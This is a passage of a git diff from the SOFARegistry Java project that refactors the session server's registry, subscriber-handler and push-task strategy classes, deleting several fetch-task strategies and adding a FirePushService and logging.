for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.session.strategy.impl; - -import com.alipay.sofa.registry.common.model.store.URL; -import com.alipay.sofa.registry.core.model.ReceivedData; -import com.alipay.sofa.registry.server.session.strategy.ReceivedDataMultiPushTaskStrategy; - -/** - * @author xuanbei - * @since 2019/1/4 - */ -public class DefaultReceivedDataMultiPushTaskStrategy implements ReceivedDataMultiPushTaskStrategy { - @Override - public Object convert2PushData(ReceivedData receivedData, URL url) { - return receivedData; - } -} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/strategy/impl/DefaultSessionRegistryStrategy.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/strategy/impl/DefaultSessionRegistryStrategy.java index 630058f56..574a9ee61 100644 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/strategy/impl/DefaultSessionRegistryStrategy.java +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/strategy/impl/DefaultSessionRegistryStrategy.java @@ -22,135 +22,77 @@ import com.alipay.sofa.registry.log.Logger; import com.alipay.sofa.registry.log.LoggerFactory; import com.alipay.sofa.registry.server.session.bootstrap.SessionServerConfig; -import com.alipay.sofa.registry.server.session.cache.CacheService; -import com.alipay.sofa.registry.server.session.cache.DatumKey; -import com.alipay.sofa.registry.server.session.cache.Key; -import com.alipay.sofa.registry.server.session.store.Interests; +import com.alipay.sofa.registry.server.session.push.FirePushService; import com.alipay.sofa.registry.server.session.strategy.SessionRegistryStrategy; import com.alipay.sofa.registry.task.listener.TaskEvent; import com.alipay.sofa.registry.task.listener.TaskListenerManager; +import com.google.common.annotations.VisibleForTesting; import org.springframework.beans.factory.annotation.Autowired; -import java.util.HashSet; -import java.util.Map; -import java.util.Set; - /** + * @author kezhu.wukz * @author xuanbei * @since 2019/2/15 */ public class DefaultSessionRegistryStrategy implements SessionRegistryStrategy { - private static final Logger LOGGER = LoggerFactory - .getLogger(DefaultSessionRegistryStrategy.class); - - private static final Logger CONSOLE_LOGGER = LoggerFactory.getLogger("SESSION-CONSOLE", - "[Task]"); - - private static final Logger taskLogger = LoggerFactory.getLogger( - DefaultSessionRegistryStrategy.class, "[Task]"); - - /** - * store subscribers - */ - @Autowired - private Interests sessionInterests; - - /** - * trigger task com.alipay.sofa.registry.server.meta.listener process - */ - @Autowired - private TaskListenerManager taskListenerManager; - - @Autowired - private SessionServerConfig sessionServerConfig; - - @Autowired - private CacheService sessionCacheService; + private static final Logger taskLogger = + LoggerFactory.getLogger(DefaultSessionRegistryStrategy.class, "[Task]"); - @Override - public void doFetchChangDataProcess(Map> dataInfoIdVersions) { - //diff dataCenter same dataInfoId sent once fetch on cloud mode - Set changeDataInfoIds = new HashSet<>(); - dataInfoIdVersions.forEach((dataCenter, dataInfoIdMap) -> { - if (dataInfoIdMap != null) { - dataInfoIdMap.forEach((dataInfoID, version) -> { - if (checkInterestVersions(dataCenter, dataInfoID, version)) { + /** trigger task com.alipay.sofa.registry.server.meta.listener process */ + @Autowired private TaskListenerManager taskListenerManager; - //update cache - sessionCacheService.invalidate(new Key( - Key.KeyType.OBJ, DatumKey.class.getName(), new DatumKey(dataInfoID, dataCenter))); + @Autowired private FirePushService firePushService; - changeDataInfoIds.add(dataInfoID); - } - }); - } - }); + @Autowired private SessionServerConfig sessionServerConfig; - changeDataInfoIds.forEach(this::fireDataChangeCloudTask); - } - - private boolean checkInterestVersions(String dataCenter, String dataInfoId, Long version) { - boolean result = sessionInterests.checkInterestVersions(dataCenter, dataInfoId, version); - if (result) { - LOGGER - .info( - "Request dataCenter {} dataInfo {} fetch version {} be interested,Higher than current version!Will fire data change Task", - dataCenter, dataInfoId, version); - } - return result; - } - - private void fireDataChangeCloudTask(String dataInfoId) { - //trigger fetch data for subscriber,and push to client node - TaskEvent taskEvent = new TaskEvent(dataInfoId, - TaskEvent.TaskType.DATA_CHANGE_FETCH_CLOUD_TASK); - taskLogger.info("send " + taskEvent.getTaskType() + " taskEvent:{}", taskEvent); - taskListenerManager.sendTaskEvent(taskEvent); - } - - @Override - public void afterPublisherRegister(Publisher publisher) { - TaskEvent syncPublisherTask = new TaskEvent(publisher, - TaskEvent.TaskType.SYNC_PUBLISHER_TASK); - CONSOLE_LOGGER.info("send " + syncPublisherTask.getTaskType() + " taskEvent:{}", publisher); - taskListenerManager.sendTaskEvent(syncPublisherTask); - } - - @Override - public void afterSubscriberRegister(Subscriber subscriber) { - if (!sessionServerConfig.isStopPushSwitch()) { - //trigger fetch data for subscriber,and push to client node - TaskEvent taskEvent = new TaskEvent(subscriber, - TaskEvent.TaskType.SUBSCRIBER_REGISTER_FETCH_TASK); - taskLogger.info("send " + taskEvent.getTaskType() + " taskEvent:{}", taskEvent); - taskListenerManager.sendTaskEvent(taskEvent); - } - } - - @Override - public void afterWatcherRegister(Watcher watcher) { - fireWatcherRegisterFetchTask(watcher); - } - - @Override - public void afterPublisherUnRegister(Publisher publisher) { - - } - - @Override - public void afterSubscriberUnRegister(Subscriber subscriber) { - - } - - @Override - public void afterWatcherUnRegister(Watcher watcher) { - - } + @Override + public void afterPublisherRegister(Publisher publisher) {} - private void fireWatcherRegisterFetchTask(Watcher watcher) { - //trigger fetch data for watcher,and push to client node - TaskEvent taskEvent = new TaskEvent(watcher, TaskEvent.TaskType.WATCHER_REGISTER_FETCH_TASK); - taskLogger.info("send " + taskEvent.getTaskType() + " taskEvent:{}", taskEvent); - taskListenerManager.sendTaskEvent(taskEvent); + @Override + public void afterSubscriberRegister(Subscriber subscriber) { + if (!sessionServerConfig.isStopPushSwitch()) { + firePushService.fireOnRegister(subscriber); } + } + + @Override + public void afterWatcherRegister(Watcher watcher) { + fireWatcherRegisterFetchTask(watcher); + } + + @Override + public void afterPublisherUnRegister(Publisher publisher) {} + + @Override + public void afterSubscriberUnRegister(Subscriber subscriber) {} + + @Override + public void afterWatcherUnRegister(Watcher watcher) {} + + private void fireWatcherRegisterFetchTask(Watcher watcher) { + // trigger fetch data for watcher,and push to client node + TaskEvent taskEvent = new TaskEvent(watcher, TaskEvent.TaskType.WATCHER_REGISTER_FETCH_TASK); + taskLogger.info("send " + taskEvent.getTaskType() + " taskEvent:{}", taskEvent); + taskListenerManager.sendTaskEvent(taskEvent); + } + + @VisibleForTesting + public DefaultSessionRegistryStrategy setTaskListenerManager( + TaskListenerManager taskListenerManager) { + this.taskListenerManager = taskListenerManager; + return this; + } + + @VisibleForTesting + public DefaultSessionRegistryStrategy setFirePushService(FirePushService firePushService) { + this.firePushService = firePushService; + return this; + } + + @VisibleForTesting + public DefaultSessionRegistryStrategy setSessionServerConfig( + SessionServerConfig sessionServerConfig) { + this.sessionServerConfig = sessionServerConfig; + return this; + } } diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/strategy/impl/DefaultSubscriberHandlerStrategy.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/strategy/impl/DefaultSubscriberHandlerStrategy.java index 52eb4de74..15946ba50 100644 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/strategy/impl/DefaultSubscriberHandlerStrategy.java +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/strategy/impl/DefaultSubscriberHandlerStrategy.java @@ -16,6 +16,8 @@ */ package com.alipay.sofa.registry.server.session.strategy.impl; +import static com.alipay.sofa.registry.common.model.constants.ValueConstants.DEFAULT_INSTANCE_ID; + import com.alipay.sofa.registry.common.model.constants.ValueConstants; import com.alipay.sofa.registry.common.model.store.Subscriber; import com.alipay.sofa.registry.common.model.store.URL; @@ -25,63 +27,98 @@ import com.alipay.sofa.registry.log.Logger; import com.alipay.sofa.registry.log.LoggerFactory; import com.alipay.sofa.registry.remoting.Channel; -import com.alipay.sofa.registry.remoting.bolt.BoltChannelUtil; +import com.alipay.sofa.registry.remoting.bolt.BoltUtil; import com.alipay.sofa.registry.server.session.converter.SubscriberConverter; import com.alipay.sofa.registry.server.session.registry.Registry; import com.alipay.sofa.registry.server.session.strategy.SubscriberHandlerStrategy; import org.apache.commons.lang.StringUtils; import org.springframework.beans.factory.annotation.Autowired; -import static com.alipay.sofa.registry.common.model.constants.ValueConstants.DEFAULT_INSTANCE_ID; - /** * @author xuanbei * @since 2019/2/15 */ public class DefaultSubscriberHandlerStrategy implements SubscriberHandlerStrategy { - private static final Logger LOGGER = LoggerFactory - .getLogger(DefaultSubscriberHandlerStrategy.class); + private static final Logger SUB_LOGGER = LoggerFactory.getLogger("SUB-RECEIVE"); - @Autowired - private Registry sessionRegistry; + @Autowired private Registry sessionRegistry; - @Override - public void handleSubscriberRegister(Channel channel, SubscriberRegister subscriberRegister, - RegisterResponse registerResponse) { - try { - String ip = channel.getRemoteAddress().getAddress().getHostAddress(); - int port = channel.getRemoteAddress().getPort(); - subscriberRegister.setIp(ip); - subscriberRegister.setPort(port); + @Override + public void handleSubscriberRegister( + Channel channel, SubscriberRegister subscriberRegister, RegisterResponse registerResponse) { + Subscriber subscriber = null; + try { + String ip = channel.getRemoteAddress().getAddress().getHostAddress(); + int port = channel.getRemoteAddress().getPort(); + subscriberRegister.setIp(ip); + subscriberRegister.setPort(port); - if (StringUtils.isBlank(subscriberRegister.getZone())) { - subscriberRegister.setZone(ValueConstants.DEFAULT_ZONE); - } + if (StringUtils.isBlank(subscriberRegister.getZone())) { + subscriberRegister.setZone(ValueConstants.DEFAULT_ZONE); + } - if (StringUtils.isBlank(subscriberRegister.getInstanceId())) { - subscriberRegister.setInstanceId(DEFAULT_INSTANCE_ID); - } + if (StringUtils.isBlank(subscriberRegister.getInstanceId())) { + subscriberRegister.setInstanceId(DEFAULT_INSTANCE_ID); + } - Subscriber subscriber = SubscriberConverter.convert(subscriberRegister); - subscriber.setProcessId(ip + ":" + port); - subscriber.setSourceAddress(new URL(channel.getRemoteAddress(), BoltChannelUtil - .getBoltCustomSerializer(channel))); + subscriber = SubscriberConverter.convert(subscriberRegister); + subscriber.setProcessId(ip + ":" + port); - if (EventTypeConstants.REGISTER.equals(subscriberRegister.getEventType())) { - sessionRegistry.register(subscriber); - } else if (EventTypeConstants.UNREGISTER.equals(subscriberRegister.getEventType())) { - sessionRegistry.unRegister(subscriber); - } - registerResponse.setVersion(subscriberRegister.getVersion()); - registerResponse.setRegistId(subscriberRegister.getRegistId()); - LOGGER.info("Subscriber register success! Type:{} Info:{}", - subscriberRegister.getEventType(), subscriber); - registerResponse.setSuccess(true); - registerResponse.setMessage("Subscriber register success!"); - } catch (Exception e) { - LOGGER.error("Subscriber register error!Type{}", subscriberRegister.getEventType(), e); - registerResponse.setSuccess(false); - registerResponse.setMessage("Subscriber register failed!"); - } + handle(subscriber, channel, subscriberRegister, registerResponse); + } catch (Throwable e) { + handleError(subscriberRegister, subscriber, registerResponse, e); } + } + + protected void handle( + Subscriber subscriber, + Channel channel, + SubscriberRegister subscriberRegister, + RegisterResponse registerResponse) { + subscriber.setSourceAddress( + new URL(channel.getRemoteAddress(), BoltUtil.getBoltCustomSerializer(channel))); + subscriber.setTargetAddress(new URL(channel.getLocalAddress())); + + final String eventType = subscriberRegister.getEventType(); + if (EventTypeConstants.REGISTER.equals(eventType)) { + sessionRegistry.register(subscriber); + } else if (EventTypeConstants.UNREGISTER.equals(eventType)) { + sessionRegistry.unRegister(subscriber); + } else { + RegisterLogs.REGISTER_LOGGER.warn("unsupported subscriber.eventType:{}", eventType); + } + registerResponse.setVersion(subscriberRegister.getVersion()); + registerResponse.setRegistId(subscriberRegister.getRegistId()); + registerResponse.setSuccess(true); + registerResponse.setMessage("Subscriber register success!"); + log(true, subscriberRegister, subscriber); + } + + private void log(boolean success, SubscriberRegister subscriberRegister, Subscriber subscriber) { + // [Y|N],[R|U|N],app,zone,dataInfoId,registerId,scope,elementType,clientVersion,clientIp,clientPort + SUB_LOGGER.info( + "{},{},{},{},{},{},{},{},{},{},{},{},{}", + success ? 'Y' : 'N', + EventTypeConstants.getEventTypeFlag(subscriberRegister.getEventType()), + subscriberRegister.getAppName(), + subscriberRegister.getZone(), + subscriberRegister.getDataId(), + subscriberRegister.getGroup(), + subscriberRegister.getInstanceId(), + subscriberRegister.getRegistId(), + subscriberRegister.getScope(), + subscriber == null ? "" : subscriber.getElementType(), + subscriber == null ? "" : subscriber.getClientVersion(), + subscriberRegister.getIp(), + subscriberRegister.getPort()); + } + + protected void handleError( + SubscriberRegister subscriberRegister, + Subscriber subscriber, + RegisterResponse registerResponse, + Throwable e) { + log(false, subscriberRegister, subscriber); + RegisterLogs.logError(subscriberRegister, "Subscriber", registerResponse, e); + } } diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/strategy/impl/DefaultSubscriberMultiFetchTaskStrategy.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/strategy/impl/DefaultSubscriberMultiFetchTaskStrategy.java deleted file mode 100644 index a33637d65..000000000 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/strategy/impl/DefaultSubscriberMultiFetchTaskStrategy.java +++ /dev/null @@ -1,244 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.session.strategy.impl; - -import com.alipay.sofa.registry.common.model.Node; -import com.alipay.sofa.registry.common.model.constants.ValueConstants; -import com.alipay.sofa.registry.common.model.dataserver.Datum; -import com.alipay.sofa.registry.common.model.store.BaseInfo; -import com.alipay.sofa.registry.common.model.store.Subscriber; -import com.alipay.sofa.registry.common.model.store.URL; -import com.alipay.sofa.registry.core.model.ReceivedData; -import com.alipay.sofa.registry.core.model.ScopeEnum; -import com.alipay.sofa.registry.log.Logger; -import com.alipay.sofa.registry.log.LoggerFactory; -import com.alipay.sofa.registry.server.session.bootstrap.SessionServerConfig; -import com.alipay.sofa.registry.server.session.cache.CacheService; -import com.alipay.sofa.registry.server.session.cache.DatumKey; -import com.alipay.sofa.registry.server.session.cache.Key; -import com.alipay.sofa.registry.server.session.cache.Value; -import com.alipay.sofa.registry.server.session.converter.ReceivedDataConverter; -import com.alipay.sofa.registry.server.session.node.NodeManager; -import com.alipay.sofa.registry.server.session.node.NodeManagerFactory; -import com.alipay.sofa.registry.server.session.scheduler.task.Constant; -import com.alipay.sofa.registry.server.session.strategy.SubscriberMultiFetchTaskStrategy; -import com.alipay.sofa.registry.server.session.utils.DatumUtils; -import com.alipay.sofa.registry.task.listener.TaskEvent; -import com.alipay.sofa.registry.task.listener.TaskListenerManager; - -import java.net.InetSocketAddress; -import java.util.ArrayList; -import java.util.Collection; -import java.util.HashMap; -import java.util.List; -import java.util.Map; -import java.util.stream.Collectors; - -/** - * @author xuanbei - * @since 2019/2/15 - */ -public class DefaultSubscriberMultiFetchTaskStrategy implements SubscriberMultiFetchTaskStrategy { - private static final Logger taskLogger = LoggerFactory.getLogger( - DefaultSubscriberMultiFetchTaskStrategy.class, - "[Task]"); - - private static final Logger LOGGER = LoggerFactory - .getLogger(DefaultSubscriberMultiFetchTaskStrategy.class); - - @Override - public void doSubscriberMultiFetchTask(SessionServerConfig sessionServerConfig, - TaskListenerManager taskListenerManager, - CacheService sessionCacheService, - String fetchDataInfoId, - Collection subscribers) { - Map datumMap = getDatumsCache(fetchDataInfoId, - sessionCacheService); - - if (datumMap != null) { - - for (ScopeEnum scopeEnum : ScopeEnum.values()) { - Map> map = getPushSubscribers(scopeEnum, - subscribers); - - if (map != null && !map.isEmpty()) { - for (Map.Entry> entry : map - .entrySet()) { - Map subscriberMap = entry.getValue(); - if (subscriberMap != null && !subscriberMap.isEmpty()) { - Subscriber subscriber = subscriberMap.values().iterator().next(); - boolean isOldVersion = !BaseInfo.ClientVersion.StoreData - .equals(subscriber.getClientVersion()); - - if (isOldVersion) { - fireUserDataPushTaskCloud(entry.getKey(), datumMap, - subscriberMap.values(), subscriber, taskListenerManager); - } else { - fireReceivedDataPushTaskCloud(datumMap, - new ArrayList(subscriberMap.keySet()), subscriber, - taskListenerManager); - } - } - } - } - } - - } else { - //TODO EMPTY push empty - LOGGER.error( - "SubscriberMultiFetchTask cloud Get publisher data error,which dataInfoId:{}", - fetchDataInfoId); - } - } - - private Map getDatumsCache(String fetchDataInfoId, CacheService sessionCacheService) { - - Map map = new HashMap<>(); - NodeManager nodeManager = NodeManagerFactory.getNodeManager(Node.NodeType.META); - Collection dataCenters = nodeManager.getDataCenters(); - if (dataCenters != null) { - Collection keys = dataCenters.stream(). - map(dataCenter -> new Key(Key.KeyType.OBJ, DatumKey.class.getName(), - new DatumKey(fetchDataInfoId, dataCenter))). - collect(Collectors.toList()); - - Map values = sessionCacheService.getValues(keys); - - if (values != null) { - values.forEach((key, value) -> { - if (value != null && value.getPayload() != null) { - Datum datum = (Datum) value.getPayload(); - String dataCenter = ((DatumKey) key.getEntityType()).getDataCenter(); - map.put(dataCenter, datum); - } - }); - } - - } - return map; - } - - private Map> getPushSubscribers(ScopeEnum scopeEnum, - Collection subscribers) { - - Map> payload = new HashMap<>(); - - subscribers.forEach((subscriber) -> { - - if (subscriber.getScope().equals(scopeEnum)) { - InetSocketAddress address = new InetSocketAddress( - subscriber.getSourceAddress().getIpAddress(), - subscriber.getSourceAddress().getPort()); - Map map = payload.computeIfAbsent(address, k -> new HashMap<>()); - map.put(subscriber.getRegisterId(), subscriber); - payload.put(address, map); - } - }); - - return payload; - } - - private void fireUserDataPushTaskCloud(InetSocketAddress address, - Map datumMap, - Collection subscribers, - Subscriber subscriber, - TaskListenerManager taskListenerManager) { - Datum merge = null; - if (datumMap != null && !datumMap.isEmpty()) { - merge = ReceivedDataConverter.getMergeDatum(datumMap); - } - - ScopeEnum scopeEnum = subscriber.getScope(); - - if (scopeEnum == ScopeEnum.zone) { - fireUserDataElementPushTask(address, merge, subscribers, subscriber, - taskListenerManager); - } else { - fireUserDataElementMultiPushTask(address, merge, subscribers, subscriber, - taskListenerManager); - } - } - - private void fireUserDataElementPushTask(InetSocketAddress address, Datum datum, - Collection subscribers, - Subscriber subscriber, - TaskListenerManager taskListenerManager) { - datum = DatumUtils.newDatumIfNull(datum, subscriber); - TaskEvent taskEvent = new TaskEvent(TaskEvent.TaskType.USER_DATA_ELEMENT_PUSH_TASK); - - taskEvent.setAttribute(Constant.PUSH_CLIENT_SUBSCRIBERS, subscribers); - taskEvent.setAttribute(Constant.PUSH_CLIENT_DATUM, datum); - taskEvent.setAttribute(Constant.PUSH_CLIENT_URL, new URL(address)); - - int size = datum.getPubMap() != null ? datum.getPubMap().size() : 0; - - taskLogger.info("send {} taskURL:{},dataInfoId={},dataCenter={},pubSize={},subSize={}", - taskEvent.getTaskType(), address, datum.getDataInfoId(), datum.getDataCenter(), size, - subscribers.size()); - taskListenerManager.sendTaskEvent(taskEvent); - } - - private void fireUserDataElementMultiPushTask(InetSocketAddress address, Datum datum, - Collection subscribers, - Subscriber subscriber, - TaskListenerManager taskListenerManager) { - datum = DatumUtils.newDatumIfNull(datum, subscriber); - TaskEvent taskEvent = new TaskEvent(TaskEvent.TaskType.USER_DATA_ELEMENT_MULTI_PUSH_TASK); - - taskEvent.setAttribute(Constant.PUSH_CLIENT_SUBSCRIBERS, subscribers); - taskEvent.setAttribute(Constant.PUSH_CLIENT_DATUM, datum); - taskEvent.setAttribute(Constant.PUSH_CLIENT_URL, new URL(address)); - - int size = datum.getPubMap() != null ? datum.getPubMap().size() : 0; - - taskLogger.info("send {} taskURL:{},dataInfoId={},dataCenter={},pubSize={},subSize={}", - taskEvent.getTaskType(), address, datum.getDataInfoId(), datum.getDataCenter(), size, - subscribers.size()); - taskListenerManager.sendTaskEvent(taskEvent); - } - - private void fireReceivedDataPushTaskCloud(Map datumMap, - List subscriberRegisterIdList, - Subscriber subscriber, - TaskListenerManager taskListenerManager) { - - ReceivedData receivedData; - if (datumMap != null && !datumMap.isEmpty()) { - - receivedData = ReceivedDataConverter.getReceivedDataMulti(datumMap, - subscriber.getScope(), subscriberRegisterIdList, subscriber); - - } - //no datum - else { - receivedData = ReceivedDataConverter.getReceivedDataMulti(subscriber.getDataId(), - subscriber.getGroup(), subscriber.getInstanceId(), - ValueConstants.DEFAULT_DATA_CENTER, subscriber.getScope(), - subscriberRegisterIdList, subscriber.getCell()); - - } - - //trigger push to client node - Map parameter = new HashMap<>(); - parameter.put(receivedData, subscriber.getSourceAddress()); - TaskEvent taskEvent = new TaskEvent(parameter, - TaskEvent.TaskType.RECEIVED_DATA_MULTI_PUSH_TASK); - taskLogger.info("send {} taskURL:{},taskScope:{}", taskEvent.getTaskType(), - subscriber.getSourceAddress(), subscriber.getScope()); - taskListenerManager.sendTaskEvent(taskEvent); - } -} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/strategy/impl/DefaultSubscriberRegisterFetchTaskStrategy.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/strategy/impl/DefaultSubscriberRegisterFetchTaskStrategy.java deleted file mode 100644 index 0c7f1ac91..000000000 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/strategy/impl/DefaultSubscriberRegisterFetchTaskStrategy.java +++ /dev/null @@ -1,169 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.session.strategy.impl; - -import com.alipay.sofa.registry.common.model.constants.ValueConstants; -import com.alipay.sofa.registry.common.model.dataserver.Datum; -import com.alipay.sofa.registry.common.model.store.BaseInfo; -import com.alipay.sofa.registry.common.model.store.Subscriber; -import com.alipay.sofa.registry.common.model.store.URL; -import com.alipay.sofa.registry.core.model.ReceivedData; -import com.alipay.sofa.registry.core.model.ScopeEnum; -import com.alipay.sofa.registry.log.Logger; -import com.alipay.sofa.registry.log.LoggerFactory; -import com.alipay.sofa.registry.server.session.bootstrap.SessionServerConfig; -import com.alipay.sofa.registry.server.session.cache.CacheService; -import com.alipay.sofa.registry.server.session.converter.ReceivedDataConverter; -import com.alipay.sofa.registry.server.session.node.service.DataNodeService; -import com.alipay.sofa.registry.server.session.scheduler.task.Constant; -import com.alipay.sofa.registry.server.session.strategy.SubscriberRegisterFetchTaskStrategy; -import com.alipay.sofa.registry.server.session.utils.DatumUtils; -import com.alipay.sofa.registry.task.listener.TaskEvent; -import com.alipay.sofa.registry.task.listener.TaskListenerManager; - -import java.util.ArrayList; -import java.util.Collection; -import java.util.Collections; -import java.util.HashMap; -import java.util.List; -import java.util.Map; - -/** - * @author xuanbei - * @since 2019/2/15 - */ -public class DefaultSubscriberRegisterFetchTaskStrategy implements - SubscriberRegisterFetchTaskStrategy { - private static final Logger taskLogger = LoggerFactory.getLogger( - DefaultSubscriberRegisterFetchTaskStrategy.class, - "[Task]"); - - @Override - public void doSubscriberRegisterFetchTask(SessionServerConfig sessionServerConfig, - TaskListenerManager taskListenerManager, - DataNodeService dataNodeService, - CacheService sessionCacheService, - Subscriber subscriber) { - if (subscriber == null) { - throw new IllegalArgumentException("Subscriber can not be null!"); - } - - List subscriberRegisterIdList = Collections.singletonList(subscriber - .getRegisterId()); - - boolean isOldVersion = !BaseInfo.ClientVersion.StoreData.equals(subscriber - .getClientVersion()); - - Map datumMap = dataNodeService.fetchGlobal(subscriber - .getDataInfoId()); - if (!isOldVersion) { - fireReceivedDataPushTaskCloud(datumMap, subscriberRegisterIdList, subscriber, - taskListenerManager); - } else { - fireUserDataPushTaskCloud(datumMap, subscriber, taskListenerManager); - } - } - - private void fireReceivedDataPushTaskCloud(Map datumMap, - List subscriberRegisterIdList, - Subscriber subscriber, - TaskListenerManager taskListenerManager) { - ReceivedData receivedData; - if (datumMap != null && !datumMap.isEmpty()) { - - receivedData = ReceivedDataConverter.getReceivedDataMulti(datumMap, - subscriber.getScope(), subscriberRegisterIdList, subscriber); - - } - //no datum - else { - receivedData = ReceivedDataConverter.getReceivedDataMulti(subscriber.getDataId(), - subscriber.getGroup(), subscriber.getInstanceId(), - ValueConstants.DEFAULT_DATA_CENTER, subscriber.getScope(), - subscriberRegisterIdList, subscriber.getCell()); - - } - - firePush(receivedData, subscriber, taskListenerManager); - } - - private void firePush(ReceivedData receivedData, Subscriber subscriber, - TaskListenerManager taskListenerManager) { - //trigger push to client node - Map parameter = new HashMap<>(); - parameter.put(receivedData, subscriber.getSourceAddress()); - TaskEvent taskEvent = new TaskEvent(parameter, - TaskEvent.TaskType.RECEIVED_DATA_MULTI_PUSH_TASK); - taskLogger.info("send {} taskURL:{},taskScope:{}", taskEvent.getTaskType(), - subscriber.getSourceAddress(), receivedData.getScope()); - taskListenerManager.sendTaskEvent(taskEvent); - } - - private void fireUserDataPushTaskCloud(Map datumMap, Subscriber subscriber, - TaskListenerManager taskListenerManager) { - Datum merge = null; - if (datumMap != null && !datumMap.isEmpty()) { - merge = ReceivedDataConverter.getMergeDatum(datumMap); - } - - if (subscriber.getScope() == ScopeEnum.zone) { - fireUserDataElementPushTask(merge, subscriber, taskListenerManager); - } else { - fireUserDataElementMultiPushTask(merge, subscriber, taskListenerManager); - } - } - - private void fireUserDataElementPushTask(Datum datum, Subscriber subscriber, - TaskListenerManager taskListenerManager) { - datum = DatumUtils.newDatumIfNull(datum, subscriber); - Collection subscribers = new ArrayList<>(); - subscribers.add(subscriber); - - TaskEvent taskEvent = new TaskEvent(subscriber, - TaskEvent.TaskType.USER_DATA_ELEMENT_PUSH_TASK); - - taskEvent.setAttribute(Constant.PUSH_CLIENT_SUBSCRIBERS, subscribers); - taskEvent.setAttribute(Constant.PUSH_CLIENT_DATUM, datum); - taskEvent.setAttribute(Constant.PUSH_CLIENT_URL, subscriber.getSourceAddress()); - - int size = datum.getPubMap() != null ? datum.getPubMap().size() : 0; - taskLogger.info("send {} taskURL:{},dataInfoId={},dataCenter={},pubSize={}", - taskEvent.getTaskType(), subscriber.getSourceAddress(), datum.getDataInfoId(), - datum.getDataCenter(), size); - taskListenerManager.sendTaskEvent(taskEvent); - } - - private void fireUserDataElementMultiPushTask(Datum datum, Subscriber subscriber, - TaskListenerManager taskListenerManager) { - datum = DatumUtils.newDatumIfNull(datum, subscriber); - Collection subscribers = new ArrayList<>(); - subscribers.add(subscriber); - - TaskEvent taskEvent = new TaskEvent(subscriber, - TaskEvent.TaskType.USER_DATA_ELEMENT_MULTI_PUSH_TASK); - taskEvent.setAttribute(Constant.PUSH_CLIENT_SUBSCRIBERS, subscribers); - taskEvent.setAttribute(Constant.PUSH_CLIENT_DATUM, datum); - taskEvent.setAttribute(Constant.PUSH_CLIENT_URL, subscriber.getSourceAddress()); - - int size = datum.getPubMap() != null ? datum.getPubMap().size() : 0; - - taskLogger.info("send {} taskURL:{},dataInfoId={},dataCenter={},pubSize={}", - taskEvent.getTaskType(), subscriber.getSourceAddress(), datum.getDataInfoId(), - datum.getDataCenter(), size); - taskListenerManager.sendTaskEvent(taskEvent); - } -} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/strategy/impl/DefaultSyncConfigHandlerStrategy.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/strategy/impl/DefaultSyncConfigHandlerStrategy.java index bac43a754..0503d636b 100644 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/strategy/impl/DefaultSyncConfigHandlerStrategy.java +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/strategy/impl/DefaultSyncConfigHandlerStrategy.java @@ -19,8 +19,7 @@ import com.alipay.sofa.registry.common.model.constants.ValueConstants; import com.alipay.sofa.registry.core.model.SyncConfigResponse; import com.alipay.sofa.registry.server.session.strategy.SyncConfigHandlerStrategy; - -import java.util.ArrayList; +import com.google.common.collect.Lists; import java.util.List; /** @@ -28,10 +27,9 @@ * @since 2019/2/15 */ public class DefaultSyncConfigHandlerStrategy implements SyncConfigHandlerStrategy { - @Override - public void handleSyncConfigResponse(SyncConfigResponse syncConfigResponse) { - List list = new ArrayList<>(); - list.add(ValueConstants.DEFAULT_DATA_CENTER); - syncConfigResponse.setAvailableSegments(list); - } + @Override + public void handleSyncConfigResponse(SyncConfigResponse syncConfigResponse) { + List list = Lists.newArrayList(ValueConstants.DEFAULT_DATA_CENTER); + syncConfigResponse.setAvailableSegments(list); + } } diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/strategy/impl/DefaultWatcherHandlerStrategy.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/strategy/impl/DefaultWatcherHandlerStrategy.java index fb9c7ec62..8fff8aacc 100644 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/strategy/impl/DefaultWatcherHandlerStrategy.java +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/strategy/impl/DefaultWatcherHandlerStrategy.java @@ -16,6 +16,8 @@ */ package com.alipay.sofa.registry.server.session.strategy.impl; +import static com.alipay.sofa.registry.common.model.constants.ValueConstants.DEFAULT_INSTANCE_ID; + import 